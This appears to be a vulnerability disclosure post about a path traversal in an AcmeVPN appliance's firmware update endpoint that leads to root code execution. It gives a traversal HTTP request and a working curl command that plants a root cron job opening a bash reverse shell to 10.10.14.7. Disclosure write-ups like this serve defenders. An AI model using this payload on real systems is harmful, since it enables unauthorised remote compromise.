During a routine assessment of an AcmeVPN appliance we found an unauthenticated path traversal in the firmware update endpoint that we chained into full root code execution. This post walks through discovery, exploitation, and the fix.
⚠️ Warning: this technique will write to the appliance filesystem. Only run it against systems you are authorized to test.
Discovery
The update endpoint accepts a filename parameter that is concatenated into a filesystem path without normalization:
POST /api/v1/update HTTP/1.1
Host: vpn.target.local
Content-Type: application/json
{"file": "../../../../etc/cron.d/payload"}Exploitation
By traversing out of the intended directory we can drop a cron job that executes our payload as root:
curl -sk https://vpn.target.local/api/v1/update \
-H 'Content-Type: application/json' \
-d '{"file":"../../../../etc/cron.d/x","data":"* * * * * root /bin/bash -i >& /dev/tcp/10.10.14.7/443 0>&1"}'✅ Tip: catch the reverse shell with a simple listener before sending the request.
Affected versions
| Version | Status |
|---|---|
| 4.0 – 4.3 | Vulnerable |
| 4.4+ | Patched |
Disclosure timeline
Reported to the vendor on day 0, triaged within a week, patched in 4.4, and publicly disclosed after the 90-day window.
🛑 Danger: unpatched appliances remain exploitable from the network with no credentials.